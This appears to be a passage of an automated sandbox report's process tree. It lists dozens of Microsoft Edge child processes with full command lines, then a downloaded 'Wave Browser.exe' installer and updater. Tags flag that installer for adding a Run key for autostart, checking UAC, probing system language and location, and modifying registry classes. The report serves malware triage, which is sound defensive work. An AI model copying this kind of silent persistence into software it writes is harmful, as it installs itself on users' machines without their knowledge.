C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=8184,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6872 /prefetch:82⤵PID:3140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=8168,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7836 /prefetch:82⤵PID:8556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=7932,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=8164 /prefetch:82⤵PID:8496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=7712,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:82⤵PID:2508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=7888,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=8152 /prefetch:82⤵PID:7400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=7260,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6628 /prefetch:82⤵PID:2824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=7820,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7812 /prefetch:82⤵PID:3652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=6680,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=8100 /prefetch:82⤵PID:5600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=8172,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7276 /prefetch:82⤵PID:4520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=888,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=5924 /prefetch:82⤵PID:6028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5668,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=5928 /prefetch:82⤵PID:8396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=7152,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6628 /prefetch:12⤵
- Checks computer location settings
PID:7216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=6788,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=8124 /prefetch:12⤵PID:5672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=2148,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=6824 /prefetch:82⤵PID:932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5848,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=8312 /prefetch:82⤵PID:7500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --field-trial-handle=7456,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7748 /prefetch:12⤵
- Checks computer location settings
PID:8836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --field-trial-handle=7332,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7596 /prefetch:12⤵
- Checks computer location settings
PID:7240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --field-trial-handle=8336,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=884 /prefetch:12⤵
- Checks computer location settings
PID:3652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --field-trial-handle=8500,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=8508 /prefetch:12⤵
- Checks computer location settings
PID:2888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --field-trial-handle=4676,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=8624 /prefetch:12⤵
- Checks computer location settings
PID:1336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --field-trial-handle=8788,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=8804 /prefetch:12⤵
- Checks computer location settings
PID:7292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --field-trial-handle=8780,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=7592 /prefetch:12⤵
- Checks computer location settings
PID:8296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --field-trial-handle=9016,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=8540 /prefetch:12⤵
- Checks computer location settings
PID:7560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --field-trial-handle=8528,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=9120 /prefetch:12⤵
- Checks computer location settings
PID:5524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --field-trial-handle=9168,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=8972 /prefetch:12⤵PID:5424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --field-trial-handle=9344,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=9356 /prefetch:12⤵
- Checks computer location settings
PID:1756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --field-trial-handle=9340,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=9516 /prefetch:12⤵
- Checks computer location settings
PID:7656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --field-trial-handle=9628,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=9712 /prefetch:12⤵
- Checks computer location settings
PID:8280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --field-trial-handle=9852,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=9860 /prefetch:12⤵
- Checks computer location settings
PID:7540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=9324,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=10036 /prefetch:82⤵PID:6808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=10172,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=10216 /prefetch:82⤵PID:3008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --field-trial-handle=10276,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=10372 /prefetch:12⤵
- Checks computer location settings
PID:1844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --field-trial-handle=10772,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=10736 /prefetch:12⤵PID:8820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --field-trial-handle=10616,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=9644 /prefetch:12⤵PID:7888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --field-trial-handle=10576,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=10612 /prefetch:12⤵
- Checks computer location settings
PID:5528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --field-trial-handle=11040,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=11048 /prefetch:12⤵PID:2388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --field-trial-handle=11340,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=11352 /prefetch:12⤵PID:4748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=11904,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=10948 /prefetch:82⤵PID:4884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --field-trial-handle=10944,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=11992 /prefetch:12⤵
- Checks computer location settings
PID:8856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=10116,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=10128 /prefetch:82⤵PID:2824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --field-trial-handle=9680,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=11944 /prefetch:12⤵
- Checks computer location settings
PID:220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --field-trial-handle=12144,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=12200 /prefetch:12⤵PID:2924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --field-trial-handle=11328,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=11332 /prefetch:12⤵
- Checks computer location settings
PID:4276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --field-trial-handle=10144,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=11356 /prefetch:12⤵
- Checks computer location settings
PID:5016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --field-trial-handle=10832,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=10008 /prefetch:12⤵PID:4704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --field-trial-handle=11464,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=10012 /prefetch:12⤵PID:6924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=12160,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=12088 /prefetch:82⤵PID:1092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --field-trial-handle=9856,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:12⤵
- Checks computer location settings
PID:4884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations=is-enterprise-managed=no --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=9196,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=9152 /prefetch:82⤵PID:8280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=9212,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=9656 /prefetch:82⤵PID:3404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --field-trial-handle=11900,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=11076 /prefetch:12⤵
- Checks computer location settings
PID:1856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=9136,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=12080 /prefetch:82⤵PID:1184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations=is-enterprise-managed=no --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --field-trial-handle=11280,i,2202624800616744458,3705022523171382575,262144 --variations-seed-version --mojo-platform-channel-handle=11220 /prefetch:12⤵PID:5084
-
-
C:\Users\Admin\Downloads\Wave Browser.exe"C:\Users\Admin\Downloads\Wave Browser.exe"2⤵
- Checks computer location settings
PID:8880 -
C:\Users\Admin\AppData\Local\Temp\Wave\SWUpdaterSetup.exe"C:\Users\Admin\AppData\Local\Temp\Wave\SWUpdaterSetup.exe" /install "bundlename=WaveBrowser&appguid={EB149AD2-CE4E-4F51-B7FC-A149FAA4CCAF}&appname=WaveBrowser&needsadmin=False&lang=en&usagestats=1&installdataindex=1"3⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:6032 -
C:\Program Files (x86)\Wavesor\Temp\GUM5FCA.tmp\SWUpdater.exe"C:\Program Files (x86)\Wavesor\Temp\GUM5FCA.tmp\SWUpdater.exe" /install "bundlename=WaveBrowser&appguid={EB149AD2-CE4E-4F51-B7FC-A149FAA4CCAF}&appname=WaveBrowser&needsadmin=False&lang=en&usagestats=1&installdataindex=1"4⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
PID:7888 -
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" /regserver5⤵
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2248 -
C:\Users\Admin\Wavesor Software\SWUpdater\1.3.135.0\SWUpdaterComRegisterShell64.exe"C:\Users\Admin\Wavesor Software\SWUpdater\1.3.135.0\SWUpdaterComRegisterShell64.exe" /user6⤵
- Modifies registry class
PID:8288
-
-
C:\Users\Admin\Wavesor Software\SWUpdater\1.3.135.0\SWUpdaterComRegisterShell64.exe"C:\Users\Admin\Wavesor Software\SWUpdater\1.3.135.0\SWUpdaterComRegisterShell64.exe" /user6⤵
- Modifies registry class
PID:8036
-
-
C:\Users\Admin\Wavesor Software\SWUpdater\1.3.135.0\SWUpdaterComRegisterShell64.exe"C:\Users\Admin\Wavesor Software\SWUpdater\1.3.135.0\SWUpdaterComRegisterShell64.exe" /user6⤵
- Modifies registry class
PID:3868
-
-
-
